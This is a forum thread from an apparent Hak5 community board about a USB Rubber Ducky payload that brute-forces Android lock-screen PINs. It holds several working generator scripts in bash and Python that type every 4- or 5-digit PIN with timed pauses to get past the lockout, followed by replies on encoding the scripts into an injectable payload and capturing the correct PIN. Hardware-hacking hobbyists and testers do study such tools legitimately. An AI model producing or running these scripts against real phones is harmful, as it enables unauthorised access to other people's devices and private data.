Jump to content

[Payload] Android Brute Force 4-digit pin


Darren Kitchen

Recommended Posts

The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky?

Link to post
Share on other sites
  • 3 months later...
  • Replies 72
  • Created
  • Last Reply
On 06/12/2012 at 11:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Hey darren,

Any chance of putting your 600k script on github so we can look at it?
cheers

Link to post
Share on other sites
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

Link to post
Share on other sites
On 6/28/2017 at 0:36 PM, b0N3z said:

echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

That will take a very long time..

Link to post
Share on other sites
10 hours ago, Dave-ee Jones said:

That will take a very long time..

as per Darren about 166hrs

Link to post
Share on other sites

Hey I make a script to make the 4 digit combination in Python so, if you have Python just copy the code and then run it and in the output you will have the combination.

In Python was more hard to make because Python is not maked to do Bruteforce and their limit but finally I make the code so.

(I am Just 15 Years and a starter on Python so possible the code can be better than that)

Here is the code:

"""
change x=int(Put a number) Down
Put only 1-9 and copy all code
and then you have the Payload
"""
x=int(0)
number=int(0)
while (number)<=9:
  print"STRING",(str(x))+"00"+str(number)
  print"ENTER"
  if (number) in list(range(0,9,5)):
   print"DELAY 34250"
   (number)+=int(1)
  else:
   number+=int(1)
   if (number) == 10:
    while number <= int(100):
     print"STRING",(str(x))+"0"+str(number)
     print"ENTER"
     if (number) in list(range(10,100,5)):
      print"DELAY 34250"
      (number)+=int(1)
     else:
      (number)+=int(1)
      if (number) == int(100):
       while number != int(1000):
         print"STRING",(str(x))+str(number)
         print"ENTER"
         if (number) in list(range(100,999,5)):
          print"DELAY 34250"
          (number)+=int(1)
         else:
          (number)+=int(1)
          if (number) == int(1000):
           x+=int(1)
           break
Link to post
Share on other sites
On ‎12‎/‎12‎/‎2012 at 5:36 PM, keb0x80 said:

I created a script to generate pretty much the same output using only bash loops/conditions

 


#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
    do
	  echo "DELAY 5000"
	  echo "ENTER"
    done
  fi
done
[/CODE]

 

I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize  !in bash.  What am I doing wrong?

Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 7:38 PM, Darren Kitchen said:

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

 

On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Im in duck tool kit.com and trying to use this script but it doesn't work.  What am I doing wrong?

Link to post
Share on other sites

The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky.  This wont work with just trying to convert the command.

Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

So how do I use this code on your duck tool kit.com site?

Link to post
Share on other sites
On 7/5/2017 at 6:24 PM, TTT101907 said:

So how do I use this code on your duck tool kit.com site?

Do you have linux?

Link to post
Share on other sites
  • 1 month later...

hi, im a newbie :P ..  how i can on Encode this code for work and create Inject.bin?

then put into Android Smartphone with USB rubber Ducky?


Because the code

#!/bin/bashclearecho -e "========================================================"echo -e " This script downloads the rockyou password list"echo -e " 
	

 

IT SAYS that is not language appropriate and i can't create inject file on duckytools.THanks

 

Link to post
Share on other sites
  • 4 months later...

This method won't work on my Android phone. It's set to use the Sim-pin, so 3 wrong tries and you'll need the PUK (aka. SuperPIN) :grin:

But I have it saved locally in case I get the chance to use it.

Link to post
Share on other sites
3 hours ago, fabrice said:

I think it's not for the sim pin, but only for android device access.

I know :wink: It's only for the android-based access code option.

Link to post
Share on other sites

To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named

android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

Link to post
Share on other sites
  • 2 weeks later...

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help 

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE] 

The original script^

Link to post
Share on other sites
8 hours ago, Jay1 said:

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help 

It generates the text-file android_brute-force_0000-9999.txt which you have to encode.

The script you posted has to be executed in a shell

Link to post
Share on other sites
  • 4 weeks later...
  • 11 months later...
On 1/16/2018 at 3:43 AM, cmd97 said:

To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named


android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

I doubt it will work on such a recent version ...
Surely it works up to the Kitkat version (4.4.2) and maybe (I'm not sure) up to 5.0, but the new android versions after some attempts increase exponentially the waiting time between one attempt and another, and then you should fix the script even just to give it a try ....

Link to post
Share on other sites
  • 1 month later...

Hello Darren I love the show and all the information you guys put out> i just got my rubber ducky not long ago and have been messing around with it. i was wondering if there is a way to save the information gathered to the rubberduck itself? and would i be able to say use a 8GB micro instead of the one it came with. sorry if my question seems ignorant or anything im just curious!!

 

Link to post
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.


×
×
  • Create New...